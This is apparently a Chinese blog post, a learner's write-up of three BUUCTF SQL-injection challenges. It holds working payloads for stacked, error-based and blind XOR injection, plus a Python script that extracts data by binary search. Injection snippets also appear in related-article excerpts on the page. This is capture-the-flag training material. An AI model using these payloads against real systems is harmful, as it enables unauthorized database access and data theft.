wmm的学习日记(sql注入练习)

最新推荐文章于 2024-05-07 23:35:00 发布
最新推荐文章于 2024-05-07 23:35:00 发布
阅读量144 收藏
点赞数
文章标签: sql 学习 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/swmmbswzy/article/details/128102174
版权

前段时间浅学了一下sql注入的基础,做了一些题目来巩固一下知识 

目录

BUUCTF 随便注

show 

堆叠注入

 mysql中修改字段和表名

rename table和alter table

 alter

BUUCTF[极客大挑战 2019]HardSQL

 小结

BUUCTF[极客大挑战 2019]FinalSQL

 

BUUCTF 随便注

第一步,尝试采用联合注入,但是发现select被过滤了,不能采用联合注入了于是采用堆叠注入而且不能用select查询,我们用show代替 

show 

#显示mysql中所有数据库的名称
show databases; 
#显示当前数据库中所有表的名称
show tables;
show tables from database_name;  
#显示表中列名称
show columns from table_name from database_name;
show columns from database_name.table_name;

堆叠注入

在sql语句中分号代表一个语句的结束,我们可以采用多个;来拼接多条sql语句达到查询目标信息的作用

1';show tables;#
select * from where id='1';show tables;

如上述语句就会输出id=1的信息和当前数据库的表名 

第二步,查看当前的表和字段

1';show tables;#

发现有两个表,查看各表的字段

1'; show columns from `words`;#
1'; show columns from `1919810931114514`;#

 发现在19810931114514表中存在flag(如图1),words表中有两个字段(如图3,4)一个是int,一个是char与查询的数据格式相同(如图2)大胆猜测输入框中查询的是words表,因此,我们想要得到flag可以将‘1919810931114514‘改为’words’借此得到flag

 mysql中修改字段和表名

rename table和alter table

在mysql中可以用rename table和alter来修改表名,alter可以修改临时表但是rename不行同一数据库下表名不能重复

rename table old_table_name to new_table_name;
alter table old_table_name  rename to new_table_name;

 alter

#删除字段
alter table table_name drop column column_name;
#增加字段
alter table table_name add column column_name;
#修改字段的类型
alter table table_name change column column_name new_column 新属性;
#重命名列
alter table table_name change column old_column new_column 属性
#重命名表
alter table old_table_name rename to new_table_name

第三步修改表‘1919810931114514‘为’words’,修改flag字段为id,添加一个varchar类型的字段借此得到flag

1';rename table `words` to w;
rename table `1919810931114514` to `words`;
alter table words change column flag id varchar(100);
show tables;#

 这里要注意上面的语句要一次性注入,因为查询的是words表,如是分开注入就找不到words表了,最后用万能密码得到flag

BUUCTF[极客大挑战 2019]HardSQL

第一步,尝试万能密码,发现被过滤了,猜测过滤了空格用/**/代替发现不可以,尝试用()代替空格发现可以注入而且有报错回显,于是猜测是报错注入过滤了空格

 第二步采用报错注入,发现没有连接上,看了别的题解发现web用'^’连接函数

 注入以下内容得到数据库名

username=admin&password=1'^extractvalue(1,concat(0x5c,(database())));%23

第三步,获取表名,发现过滤了‘=’,用‘like'代替得到表名

1'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))));%23

第四步,获取字段名 

1'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))));%23

第五步,获取flag发现只有一半,用right函数得到另外一半拼接得到flag

1'^extractvalue(1,concat(0x5c,(select(group_concat(password))from(H4rDsq1))));%23

1'^extractvalue(1,concat(0x5c,(select(right(password,20))from(H4rDsq1))));%23

 小结

  1. ()代替空格
  2. like代替=
  3. ^连接函数
  4. right()函数获取部分flag

BUUCTF[极客大挑战 2019]FinalSQL

第一步,查找注入点,这题可能的注入点有两个,其中一个为账号密码登录,另一个是id

用bp进行fuzz测试发现注入点是/search.php?id=,并且发现^没有被过滤,可以用^进行盲注

 第二步,尝试寻找注入成功的回显页面,已知1^1=0,0^0=0,1^0=1,当后面的语句返回为0时(错误)会出现当前页面‘Click';当后面的语句返回为1(正确)时会出现’ERROR'

所以我们可构造python脚本,本来是没有使用二分法,但是发现之前的方法会跳过一些字符所以借鉴了别的大佬的脚本

import string
import requests

s=string.ascii_lowercase+string.digits+'{-,}'
url="http://bee5bb8f-43d5-488e-9af1-626a6428d6ac.node4.buuoj.cn:81/search.php?"
flag=""
i=0
while True:
   i+=1
   begin=32#从可打印字符开始
   end=126
   tmp=(begin+end) // 2
   print(i)
   while begin < end:
       #爆库名
       #id=1^(ascii(substr(database(),%d,1))>%d)
       #geek
       #爆表名
       #id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))>%d)
       #F1naI1y,Flaaaaag
       #爆字段名
       #id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))>%d)
       #id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)
       #Flaaaaag:id,fl4gawsl F1naI1y:id,username,password
       #获取flag
       #id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)where(username='flag')),%d,1))>%d)
       u=url+"id=1^(ascii(substr(database(),%d,1))>%d)" % (i,tmp)
       r=requests.get(u)
       if "ERROR" in r.text:#如正确,说明该字母大于tmp
            begin=tmp+1
            tmp=(begin+end)//2
       else:
            end=tmp
            tmp=(begin+end)//2
   flag += chr(tmp)
   print(flag)
   if begin == 32:#查找结束
       break

swmmbswzy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SQL注入练习]K8-ASP渗透环境[K8team].rar
05-08
[SQL注入练习]K8-ASP渗透环境[K8team].rar
WMM Power save最新测试文档
06-15
WMM Power save最新测试文档
sql注入练习
q998940091的博客
11-19 3599
对grade网站进行漏洞探测,爆出任意表的账号密码。 基本信息: 网站截图 1.对grade网站进行漏洞探测,爆出任意表的账号密码。 在查询学号处 1) 猜测的用户admin,查询学号成功 2)输入 admin and 1=1,发现能够正确执行没有报错,但没有查出学号,说明可能是字符型注入 admin and 1=1 3)输入admin’ and 1=1 – - ,执行成功,且查出学号,确定是字符型注入 admin' and 1=1 -- - 4)order by 判断显示字段数 admin’
sql注入---sqli靶场1-9
最新发布
weixin_72202802的博客
05-07 496
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
世界地磁模型系数文件,WMM2020COF
06-14
《全球地磁模型WMM2020COF:理论与应用》 全球地磁模型(World Magnetic Model,简称WMM)是地球磁场的一种数学表示,用于描述地球表面及空间的磁力线分布。WMM2020COF则是2020年至2025年期间该模型的系数文件,...
WIFI WMM 协议
12-07
**WiFi WMM协议详解** WiFi WMM,全称为Wi-Fi Multimedia,文译为“无线多媒体”,是Wi-Fi Alliance推出的一种增强型服务质量(QoS,Quality of Service)标准,旨在优化无线局域网(WLAN)的性能,特别是针对...
wmm test plan
10-15
of the term “WMM” shall refer to the WMM baseline functionality and the term “WSM” shall refer to the optional “Scheduled Access” capability to be defined and tested separately
WMM规范 1.1
04-01
This document defines the specification for WMM, an 802.11 quality of service (QoS) implementation based on a subset of the draft 802.11e standard supplement [2]. It is motivated by the need to ...
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
SQL注入练习
qq_49422880的博客
07-31 791
[GYCTF2020]Ezsqli 这道题输入几个数字之后,我就感觉就是要用盲注暴力破解。所以就看看报错的内容是什么,进行异或注入即可。 输入1的时候显示 输入2的时侯显示 输到三的时候 Error Occured When Fetch Result. 输到十的时候 Error Occured When Fetch Result. 随便输入字符 bool(false) 嘿嘿,基本确定是要跑脚本暴力破解。 先做fuzz测试,看看过滤掉哪些关键词 handler INFORMATION,还有很多… 1.开
ElasticSearch
Blanklr的博客
10-13 530
ElasticSearch 是非关系型数据库 官网: www.elastic.co,是基于Lucene的搜索服务器 关系型数据库查询的弊端 : 性能低、功能弱 ES是弥补这一缺点而诞生的 1.性能低 模糊查询 一条条的遍历 2.功能弱 存储的都是字符串 不能在商品信息字段 查询出 含有华为或手机的 倒排索引 将各个文档的内容进行分词、形成词条。然后记录词条和数据的唯一标识的对应关系,形成的产物。是一个散列图 存储原理 1.在index索引库 生成数据表,即把所有的文档都进行分词
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2671
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
sql注入练习之——sqli-labs 1-25
wsnbbz的博客
02-10 3014
第一关: 注入点:‘连接的字符串 数据脱库: -1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- - 第二关: 注入点:数值型 数据脱库: -1 union select 1,(select group_concat(concat_ws(0x7e,username,...
Sql 注入 练习 sql-lib 3
qq_41619455的博客
08-02 179
sqllia学习
SQL注入进阶练习(一)一些进阶的注入方法
好好睡觉
03-10 2435
二次注入、宽字节注入、order by注入、limit 注入
wmm2015模型下载
02-07
wmm2015模型是世界磁场模型的缩写,它用于描述地球磁场的变化和分布。如果您需要下载wmm2015模型,可以通过以下几种途径进行: 首先,您可以访问美国国家地理空间情报局(NGA)的官方网站,他们会定期更新最新的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值